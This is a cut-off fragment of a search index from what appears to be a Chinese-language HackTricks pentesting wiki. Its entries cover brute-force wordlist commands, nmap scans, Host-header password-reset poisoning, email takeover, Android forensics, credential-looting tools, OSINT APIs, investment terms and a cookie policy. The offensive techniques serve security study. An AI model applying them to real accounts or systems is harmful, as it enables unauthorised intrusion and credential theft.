互动机器学习应用程序 和演示的平台。它允许开发人员 展示 他们的模型,创建用户友好的界面,并通过共享实时演示与他人合作。","breadcrumbs":"Test LLMs » Hugging Face","id":"10464","title":"Hugging Face"},"10465":{"body":"TensorFlow Hub 是一个由 Google 开发的可重用机器学习模块的综合库。它专注于促进机器学习模型的共享和部署,特别是那些使用 TensorFlow 构建的模型。 模块: 
一个庞大的预训练模型和模型组件的集合,用户可以浏览、下载和集成用于图像分类、文本嵌入等任务的模块。 教程: 逐步指南和示例,帮助用户理解如何使用 TensorFlow Hub 实现和微调模型。 文档: 综合指南和 API 参考,帮助开发人员有效利用库中的资源。","breadcrumbs":"Test LLMs » TensorFlow Hub & Kaggle","id":"10465","title":"TensorFlow Hub & Kaggle"},"10466":{"body":"Replicate 是一个平台,允许开发人员通过简单的 API 在云中运行机器学习模型。它专注于使 ML 模型易于访问和部署,而无需广泛的基础设施设置。 模型: 一个由社区贡献的机器学习模型库,用户可以浏览、尝试并将模型集成到他们的应用程序中,几乎不需要努力。 API 访问: 简单的 API 用于运行模型,使开发人员能够轻松地在自己的应用程序中部署和扩展模型。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Test LLMs » Replicate","id":"10466","title":"Replicate"},"10467":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Burp Suite » Burp Suite","id":"10467","title":"Burp Suite"},"10468":{"body":"简单列表: 仅包含每行一个条目的列表 运行时文件: 在运行时读取的列表(不加载到内存中)。用于支持大列表。 大小写修改: 对字符串列表应用一些更改(不变,转为小写,转为大写,转为专有名词 - 首字母大写,其余小写 -,转为专有名词 - 首字母大写,其余保持不变)。 数字: 生成从 X 到 Y 的数字,使用 Z 步长或随机生成。 暴力破解: 字符集,最小和最大长度。 https://github.com/0xC01DF00D/Collabfiltrator : 用于执行命令并通过 DNS 请求获取输出的有效载荷到 burpcollab。 https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e https://github.com/h3xstream/http-script-generator tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Burp Suite » 基本有效载荷","id":"10468","title":"基本有效载荷"},"10469":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Other Web Tricks » 其他网络技巧","id":"10469","title":"其他网络技巧"},"1047":{"body":"bash crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet\\ncrunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst) @ Lower case alpha characters\\n, Upper case alpha characters\\n% Numeric characters\\n^ Special characters including spac\\ncrunch 6 8 -t ,@@^^%%","breadcrumbs":"Brute Force - CheatSheet » Crunch","id":"1047","title":"Crunch"},"10470":{"body":"几次后端信任 Host header 来执行某些操作。例如,它可能会使用其值作为 发送密码重置的域 。因此,当您收到一封带有重置密码链接的电子邮件时,使用的域是您在 Host header 中输入的域。然后,您可以请求其他用户的密码重置,并将域更改为您控制的域,以窃取他们的密码重置代码。 WriteUp 。 warning 请注意,您甚至可能不需要等待用户点击重置密码链接来获取令牌,因为可能连 垃圾邮件过滤器或其他中介设备/机器人都会点击它进行分析 。","breadcrumbs":"Other Web Tricks » 主机头","id":"10470","title":"主机头"},"10471":{"body":"有时,当您正确完成某些验证时,后端会 仅将值为 \\"True\\" 的布尔值添加到您的会话的安全属性中 。然后,另一个端点将知道您是否成功通过了该检查。 然而,如果您 通过了检查 ,并且您的会话在安全属性中获得了 \\"True\\" 值,您可以尝试 访问其他资源 ,这些资源 依赖于相同的属性 ,但您 不应该有权限 访问。 WriteUp 。","breadcrumbs":"Other Web Tricks » 会话布尔值","id":"10471","title":"会话布尔值"},"10472":{"body":"尝试以已存在用户的身份注册。也尝试使用等效字符(点、多个空格和 Unicode)。","breadcrumbs":"Other Web Tricks » 注册功能","id":"10472","title":"注册功能"},"10473":{"body":"注册一个电子邮件,在确认之前更改电子邮件,然后,如果新的确认电子邮件发送到第一个注册的电子邮件,您可以接管任何电子邮件。或者,如果您可以启用第二个电子邮件以确认第一个电子邮件,您也可以接管任何账户。","breadcrumbs":"Other Web Tricks » 
接管电子邮件","id":"10473","title":"接管电子邮件"},"10474":{"body":"Jira Service Management","breadcrumbs":"Other Web Tricks » 访问使用 atlassian 的公司内部服务台","id":"10474","title":"访问使用 atlassian 的公司内部服务台"},"10475":{"body":"开发人员可能会忘记在生产环境中禁用各种调试选项。例如,HTTP TRACE 方法是为诊断目的而设计的。如果启用,web 服务器将通过在响应中回显收到的确切请求来响应使用 TRACE 方法的请求。这种行为通常是无害的,但偶尔会导致信息泄露,例如可能由反向代理附加到请求的内部身份验证头的名称。 Image for post Image for post tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Other Web Tricks » TRACE 方法","id":"10475","title":"TRACE 方法"},"10476":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Android Forensics » Android Forensics","id":"10476","title":"Android Forensics"},"10477":{"body":"要开始从 Android 设备提取数据,设备必须解锁。如果设备被锁定,您可以: 检查设备是否启用了 USB 调试。 检查是否存在可能的 smudge attack 尝试使用 Brute-force","breadcrumbs":"Android Forensics » 锁定设备","id":"10477","title":"锁定设备"},"10478":{"body":"创建一个 android backup using adb 并使用 Android Backup Extractor 提取: java -jar abe.jar unpack file.backup file.tar","breadcrumbs":"Android Forensics » 数据获取","id":"10478","title":"数据获取"},"10479":{"body":"cat /proc/partitions (搜索闪存的路径,通常第一个条目是 mmcblk0 ,对应整个闪存)。 df /data (发现系统的块大小)。 dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (使用从块大小收集的信息执行)。","breadcrumbs":"Android Forensics » 如果有 root 访问或物理连接到 JTAG 接口","id":"10479","title":"如果有 root 访问或物理连接到 JTAG 接口"},"1048":{"body":"bash # Cewl gets words from the victims page\\ncewl example.com -m 5 -w words.txt # Tok (https://github.com/tomnomnom/hacks/tree/master/tok) gets words from a list of URLs\\ncat /path/to/urls.txt | tok # https://github.com/m4ll0k/BBTz/blob/master/getjswords.py gets words from a list of JS URLs\\ncat /path/to/js-urls.txt | python3 getjswords.py","breadcrumbs":"Brute Force - CheatSheet » 基于网站的字典列表","id":"1048","title":"基于网站的字典列表"},"10480":{"body":"使用 Linux Memory Extractor (LiME) 提取 RAM 信息。这是一个应该通过 adb 加载的内核扩展。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Android Forensics » 内存","id":"10480","title":"内存"},"10481":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Online Platforms with API » 在线平台与API","id":"10481","title":"在线平台与API"},"10482":{"body":"您可以查询某个IP是否与可疑/恶意活动相关。完全免费。","breadcrumbs":"Online Platforms with API » ProjectHoneypot","id":"10482","title":"ProjectHoneypot"},"10483":{"body":"检查IP地址是否与注册账户的机器人相关。它还可以检查用户名和电子邮件。最初免费。","breadcrumbs":"Online Platforms with API » BotScout","id":"10483","title":"BotScout"},"10484":{"body":"查找和验证电子邮件。 一些API请求免费,更多需要付费。 商业?","breadcrumbs":"Online Platforms with API » Hunter","id":"10484","title":"Hunter"},"10485":{"body":"查找与IP和域名相关的恶意活动。免费。","breadcrumbs":"Online Platforms with API » AlientVault","id":"10485","title":"AlientVault"},"10486":{"body":"查找与电子邮件(其他平台上的个人资料)、域名(基本公司信息、邮件和员工)和公司(从邮件获取公司信息)相关的个人数据。 您需要付费才能访问所有功能。 商业?","breadcrumbs":"Online Platforms with API » Clearbit","id":"10486","title":"Clearbit"},"10487":{"body":"网站使用的技术。昂贵... 
商业?","breadcrumbs":"Online Platforms with API » BuiltWith","id":"10487","title":"BuiltWith"},"10488":{"body":"检查主机(域名或IP)是否与可疑/恶意活动相关。提供一些免费API访问。 商业?","breadcrumbs":"Online Platforms with API » Fraudguard","id":"10488","title":"Fraudguard"},"10489":{"body":"检查主机(域名或IP)是否与可疑/恶意活动相关。提供一些免费API访问。","breadcrumbs":"Online Platforms with API » FortiGuard","id":"10489","title":"FortiGuard"},"1049":{"body":"根据你对受害者的了解(姓名、日期等)生成密码。 python3 cupp.py -h","breadcrumbs":"Brute Force - CheatSheet » CUPP","id":"1049","title":"CUPP"},"10490":{"body":"指示主机是否与垃圾邮件活动相关。提供一些免费API访问。","breadcrumbs":"Online Platforms with API » SpamCop","id":"10490","title":"SpamCop"},"10491":{"body":"基于意见和其他指标判断域名是否与可疑/恶意信息相关。","breadcrumbs":"Online Platforms with API » mywot","id":"10491","title":"mywot"},"10492":{"body":"获取IP地址的基本信息。您每月可以测试最多100K次。","breadcrumbs":"Online Platforms with API » ipinfo","id":"10492","title":"ipinfo"},"10493":{"body":"该平台提供有关域名和IP地址的信息,如IP内的域名或域名服务器内的域名、由电子邮件拥有的域名(查找相关域名)、域名的IP历史(查找CloudFlare背后的主机)、使用某个名称服务器的所有域名.... 
您有一些免费访问权限。","breadcrumbs":"Online Platforms with API » securitytrails","id":"10493","title":"securitytrails"},"10494":{"body":"允许通过电子邮件、域名或公司名称进行搜索,并检索相关的“个人”信息。它还可以验证电子邮件。有一些免费访问。","breadcrumbs":"Online Platforms with API » fullcontact","id":"10494","title":"fullcontact"},"10495":{"body":"即使在免费/社区版本中,也提供大量有关域名和IP的信息。","breadcrumbs":"Online Platforms with API » RiskIQ","id":"10495","title":"RiskIQ"},"10496":{"body":"搜索域名、IP和电子邮件并获取泄露信息。提供一些免费访问。","breadcrumbs":"Online Platforms with API » _IntelligenceX","id":"10496","title":"_IntelligenceX"},"10497":{"body":"通过IP搜索并收集与可疑活动相关的信息。提供一些免费访问。","breadcrumbs":"Online Platforms with API » IBM X-Force Exchange","id":"10497","title":"IBM X-Force Exchange"},"10498":{"body":"通过IP或IP范围搜索并获取有关扫描互联网的IP的信息。15天免费访问。","breadcrumbs":"Online Platforms with API » Greynoise","id":"10498","title":"Greynoise"},"10499":{"body":"获取IP地址的扫描信息。提供一些免费API访问。","breadcrumbs":"Online Platforms with API » Shodan","id":"10499","title":"Shodan"},"105":{"body":"开放 端口: SYN --> SYN/ACK --> RST 关闭 端口: SYN --> RST/ACK 被过滤 端口: SYN --> [没有响应] 被过滤 端口: SYN --> ICMP 消息 bash # Nmap fast scan for the most 1000tcp ports used\\nnmap -sV -sC -O -T4 -n -Pn -oA fastscan \\n# Nmap fast scan for all the ports\\nnmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan \\n# Nmap fast scan for all the ports slower to avoid failures due to -T4\\nnmap -sV -sC -O -p- -n -Pn -oA fullscan #Bettercap Scan\\nsyn.scan 192.168.1.0/24 1 10000 #Ports 1-10000","breadcrumbs":"Pentesting Network » TCP","id":"105","title":"TCP"},"1050":{"body":"一个词表生成工具,允许您提供一组单词,使您能够从给定的单词中制作多个变体,创建一个独特且理想的词表,以便针对特定目标使用。 bash python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst __ _______ _____ _______ ______ _____\\n\\\\ \\\\ / /_ _|/ ____|__ __| ____| __ \\\\\\n\\\\ \\\\ /\\\\ / / | | | (___ | | | |__ | |__) |\\n\\\\ \\\\/ \\\\/ / | | \\\\___ \\\\ | | | __| | _ /\\n\\\\ /\\\\ / _| |_ ____) | | | | |____| | \\\\ \\\\\\n\\\\/ \\\\/ |_____|_____/ |_| |______|_| \\\\_\\\\ Version 
1.0.3 Cycurity Generating wordlist...\\n[########################################] 100%\\nGenerated 67885 lines. Finished in 0.920s.","breadcrumbs":"Brute Force - CheatSheet » Wister","id":"1050","title":"Wister"},"10500":{"body":"与shodan非常相似","breadcrumbs":"Online Platforms with API » Censys","id":"10500","title":"Censys"},"10501":{"body":"通过关键字查找开放的S3桶。","breadcrumbs":"Online Platforms with API » buckets.grayhatwarfare.com","id":"10501","title":"buckets.grayhatwarfare.com"},"10502":{"body":"查找电子邮件甚至域名的泄露凭据 商业?","breadcrumbs":"Online Platforms with API » Dehashed","id":"10502","title":"Dehashed"},"10503":{"body":"搜索电子邮件出现的pastebins。商业?","breadcrumbs":"Online Platforms with API » psbdmp","id":"10503","title":"psbdmp"},"10504":{"body":"获取邮件的声誉。商业?","breadcrumbs":"Online Platforms with API » emailrep.io","id":"10504","title":"emailrep.io"},"10505":{"body":"获取泄露电子邮件的密码。商业?","breadcrumbs":"Online Platforms with API » ghostproject","id":"10505","title":"ghostproject"},"10506":{"body":"从IP获取有趣的信息","breadcrumbs":"Online Platforms with API » Binaryedge","id":"10506","title":"Binaryedge"},"10507":{"body":"通过域名和电子邮件搜索,查看是否被泄露及密码。商业?","breadcrumbs":"Online Platforms with API » haveibeenpwned","id":"10507","title":"haveibeenpwned"},"10508":{"body":"它检测IP地理位置、数据中心、ASN甚至VPN信息。每月提供免费30K查询。","breadcrumbs":"Online Platforms with API » IP2Location.io","id":"10508","title":"IP2Location.io"},"10509":{"body":"IP地理位置和OISNT,具有针对性的数据点。非商业。 https://dnsdumpster.com/ (在商业工具中?) https://www.netcraft.com/ (在商业工具中?) https://www.nmmapper.com/sys/tools/subdomainfinder/ (在商业工具中?) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Online Platforms with API » IPQuery.io","id":"10509","title":"IPQuery.io"},"1051":{"body":"","breadcrumbs":"Brute Force - CheatSheet » pydictor","id":"1051","title":"pydictor"},"10510":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果在某个时刻你发现一个 根据你的会话呈现敏感信息的网页 :也许它反映了 cookies,或者打印了信用卡详情或其他任何敏感信息,你可以尝试窃取它。 在这里,我向你展示主要的几种尝试实现这一目标的方法: CORS 绕过 :如果你可以绕过 CORS 头,你将能够通过对恶意页面执行 Ajax 请求来窃取信息。 XSS :如果你在页面上发现 XSS 漏洞,你可能能够利用它来窃取信息。 悬挂标记 :如果你无法注入 XSS 标签,你仍然可以使用其他常规 HTML 标签来窃取信息。 点击劫持 :如果没有针对这种攻击的保护,你可能能够欺骗用户向你发送敏感数据(示例 在这里 )。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Stealing Sensitive Information Disclosure from a Web » 从网页窃取敏感信息泄露","id":"10510","title":"从网页窃取敏感信息泄露"},"10511":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 PEASS-ng : 这些脚本除了寻找 PE 向量外,还会在文件系统中查找敏感信息。 LaZagne : LaZagne 项目 是一个开源应用程序,用于 检索存储在本地计算机上的大量密码 。每个软件使用不同的技术(明文、API、自定义算法、数据库等)存储其密码。该工具的开发目的是查找最常用软件的这些密码。","breadcrumbs":"Post Exploitation » 本地 l00t","id":"10511","title":"本地 l00t"},"10512":{"body":"Conf-Thief : 此模块将使用访问令牌连接到 Confluence 的 API,导出为 PDF,并下载目标可以访问的 Confluence 文档。 GD-Thief : 红队工具,用于通过 Google Drive API 从目标的 Google Drive 中提取文件,攻击者可以访问这些文件。这包括所有共享文件、所有共享驱动器中的文件,以及目标可以访问的域驱动器中的所有文件。 GDir-Thief : 红队工具,用于通过 Google 的 People API 提取您可以访问的目标组织的 Google 人员目录。 SlackPirate : 这是一个用 Python 开发的工具,利用原生 Slack API 从给定访问令牌的 Slack 工作区中提取“有趣”的信息。 Slackhound : Slackhound 是一个命令行工具,供红队和蓝队快速对 Slack 工作区/组织进行侦察。Slackhound 使组织的用户、文件、消息等的收集快速可搜索,并将大型对象写入 CSV 以供离线审查。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Post Exploitation » 外部服务","id":"10512","title":"外部服务"},"10513":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Investment Terms » 投资术语","id":"10513","title":"投资术语"},"10514":{"body":"这是进行交易的最基本方式。您可以 指明资产的数量和您想要买入或卖出的价格 ,一旦达到该价格,操作就完成了。 通常,您还可以使用 当前市场价格 以尽可能快地进行交易。 止损 - 限制 :您还可以指明买入或卖出的资产数量和价格,同时指明一个较低的价格以便在达到时买入或卖出(以止损)。","breadcrumbs":"Investment Terms » 现货","id":"10514","title":"现货"},"10515":{"body":"期货是一种合同,其中两方达成协议 在未来以固定价格获取某物 。例如,在6个月内以70,000美元出售1个比特币。 显然,如果到6个月时比特币的价值为80,000美元,卖方将亏损,而买方将获利。如果到6个月时比特币的价值为60,000美元,则情况正好相反。 然而,这对例如正在生产产品并需要确保能够以支付成本的价格出售的企业来说是有趣的。或者希望在未来确保某些东西的固定价格的企业,即使价格更高。 尽管在交易所中,这通常用于尝试获利。 请注意,“多头头寸”意味着某人押注价格将上涨 而“空头头寸”意味着某人押注价格将下跌","breadcrumbs":"Investment Terms » 期货","id":"10515","title":"期货"},"10516":{"body":"如果基金经理担心某些股票会下跌,他可能会对一些资产(如比特币或标准普尔500期货合约)采取空头头寸。这类似于购买或持有一些资产并创建一个在未来以更高价格出售这些资产的合同。 如果价格下跌,基金经理将获利,因为他将以更高的价格出售资产。如果资产的价格上涨,经理将无法获得该收益,但他仍将保留他的资产。","breadcrumbs":"Investment Terms » 使用期货对冲","id":"10516","title":"使用期货对冲"},"10517":{"body":"这些是“期货”,将无限期持续 (没有结束合同日期)。在加密货币交易所中,您可以根据加密货币的价格进出期货,这种情况非常常见。 请注意,在这些情况下,收益和损失可以实时发生,如果价格上涨1%,您将赢得1%;如果价格下跌1%,您将损失1%。","breadcrumbs":"Investment Terms » 永续期货","id":"10517","title":"永续期货"},"10518":{"body":"杠杆 允许您用较少的资金控制市场中的更大头寸。它基本上允许您“押注”比您拥有的更多的钱,仅冒您实际拥有的资金的风险。 例如,如果您以100美元的50倍杠杆在BTC/USDT中开设期货头寸,这意味着如果价格上涨1%,您将赢得1x50 = 50%的初始投资(50美元)。因此,您将拥有150美元。 然而,如果价格下跌1%,您将损失50%的资金(在这种情况下为59美元)。如果价格下跌2%,您将失去所有的押注(2x50 = 100%)。 因此,杠杆允许您控制您押注的金额,同时增加收益和损失。","breadcrumbs":"Investment Terms » 带杠杆的期货","id":"10518","title":"带杠杆的期货"},"10519":{"body":"期货和期权之间的主要区别在于合同对买方是可选的:他可以决定是否执行(通常只有在他能从中受益时才会执行)。如果买方希望使用期权,卖方必须出售。 然而,买方将向卖方支付一些费用以开设期权(因此,表面上承担更多风险的卖方开始赚取一些钱)。","breadcrumbs":"Investment Terms » 期货与期权的区别","id":"10519","title":"期货与期权的区别"},"1052":{"body":"https://github.com/danielmiessler/SecLists https://github.com/Dormidera/WordList-Compendium https://github.com/kaonashi-passwords/Kaonashi https://github.com/google/fuzzing/tree/master/dictionaries https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm 
https://weakpass.com/wordlist/ https://wordlists.assetnote.io/ https://github.com/fssecur3/fuzzlists https://hashkiller.io/listmanager https://github.com/Karanxa/Bug-Bounty-Wordlists","breadcrumbs":"Brute Force - CheatSheet » 字典列表","id":"1052","title":"字典列表"},"10520":{"body":"期货: 当您买入或卖出期货合同时,您正在进入一个 具有约束力的协议 ,以在未来某个日期以特定价格买入或卖出资产。买方和卖方都 有义务 在到期时履行合同(除非合同在此之前关闭)。 期权: 在期权中,您有 权利,但没有义务 ,在特定价格之前或在某个到期日以特定价格买入(在 看涨期权 的情况下)或卖出(在 看跌期权 的情况下)资产。 买方 有选择执行的权利,而 卖方 在买方决定行使期权时有义务完成交易。","breadcrumbs":"Investment Terms » 1. 义务与权利:","id":"10520","title":"1. 义务与权利:"},"10521":{"body":"期货: 买方和卖方都承担 无限风险 ,因为他们有义务完成合同。风险是到期日约定价格与市场价格之间的差额。 期权: 买方的风险限于为购买期权支付的 权利金 。如果市场没有朝着期权持有者有利的方向移动,他们可以简单地让期权到期。然而,期权的 卖方 (写手)在市场大幅不利于他们时面临无限风险。","breadcrumbs":"Investment Terms » 2. 风险:","id":"10521","title":"2. 风险:"},"10522":{"body":"期货: 除了持有头寸所需的保证金外,没有其他前期成本,因为买方和卖方都有义务完成交易。 期权: 买方必须为行使期权支付 期权权利金 。这个权利金本质上是期权的成本。","breadcrumbs":"Investment Terms » 3. 成本:","id":"10522","title":"3. 成本:"},"10523":{"body":"期货: 利润或损失基于到期时市场价格与合同中约定价格之间的差额。 期权: 当市场在超过支付的权利金的行使价格上有利移动时,买方获利。如果期权未被行使,卖方通过保留权利金获利。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Investment Terms » 4. 利润潜力:","id":"10523","title":"4. 
利润潜力:"},"10524":{"body":"Reading time: 3 minutes 最后更新:02/04/2023","breadcrumbs":"Cookies Policy » Cookies Policy","id":"10524","title":"Cookies Policy"},"10525":{"body":"本Cookies政策适用于HackTricks团队(“HackTricks”,“我们”,“我们”或“我们的”)拥有和运营的以下网站: hacktricks.wiki www.hacktricks.wiki book.hacktricks.wiki cloud.hacktricks.wiki 通过使用这些网站中的任何一个,您同意根据本Cookies政策使用cookies。如果您不同意,请在浏览器设置中禁用cookies或避免使用我们的网站。","breadcrumbs":"Cookies Policy » Introduction","id":"10525","title":"Introduction"},"10526":{"body":"Cookies是当您访问网站时存储在您的计算机或移动设备上的小文本文件。它们被广泛用于使网站正常工作、改善其功能并提供更个性化的用户体验。","breadcrumbs":"Cookies Policy » What are cookies?","id":"10526","title":"What are cookies?"},"10527":{"body":"我们在我们的网站上使用cookies,目的如下: Essential cookies: 这些cookies对于我们网站的基本功能是必要的,例如启用用户身份验证、维护安全性和记住您的偏好。 Performance cookies: 这些cookies帮助我们了解访客如何与我们的网站互动,通过匿名收集和报告信息。这使我们能够改善网站性能和用户体验。 Functionality cookies: 这些cookies使我们的网站能够记住您所做的选择,例如您的语言或地区,以提供更个性化的体验。 Targeting/advertising cookies: 这些cookies用于根据您的兴趣、浏览历史和与我们网站的互动提供相关广告和营销通讯。 此外,页面book.hacktricks.wiki和cloud.hacktricks.wiki托管在Gitbook上。您可以在 https://gitbook-1652864889.teamtailor.com/cookie-policy 找到有关Gitbook cookies的更多信息。","breadcrumbs":"Cookies Policy » How we use cookies","id":"10527","title":"How we use cookies"},"10528":{"body":"除了我们自己的cookies,我们还可能使用第三方cookies来报告网站使用统计信息、投放广告和启用社交媒体分享按钮。使用第三方cookies受其各自隐私政策的约束。 Managing cookies 大多数网络浏览器允许您通过其设置管理cookies。您可以选择阻止、删除或限制设备上cookies的使用。然而,请注意,禁用cookies可能会影响我们网站的功能和性能。 Changes to this Cookies Policy 我们可能会不时更新本Cookies政策,以反映我们做法或相关法律的变化。我们鼓励您定期查看此页面,以获取有关我们cookie做法的最新信息。","breadcrumbs":"Cookies Policy » Third-party cookies","id":"10528","title":"Third-party cookies"},"10529":{"body":"如果您对本Cookies政策有任何疑问或担忧,请通过 support@hacktricks.xyz 与我们联系。","breadcrumbs":"Cookies Policy » Contact us","id":"10529","title":"Contact us"},"1053":{"body":"按服务名称字母顺序排列。","breadcrumbs":"Brute Force - CheatSheet » 服务","id":"1053","title":"服务"},"1054":{"body":"bash nmap -p 548 --script afp-brute \\nmsf> use auxiliary/scanner/afp/afp_login\\nmsf> 
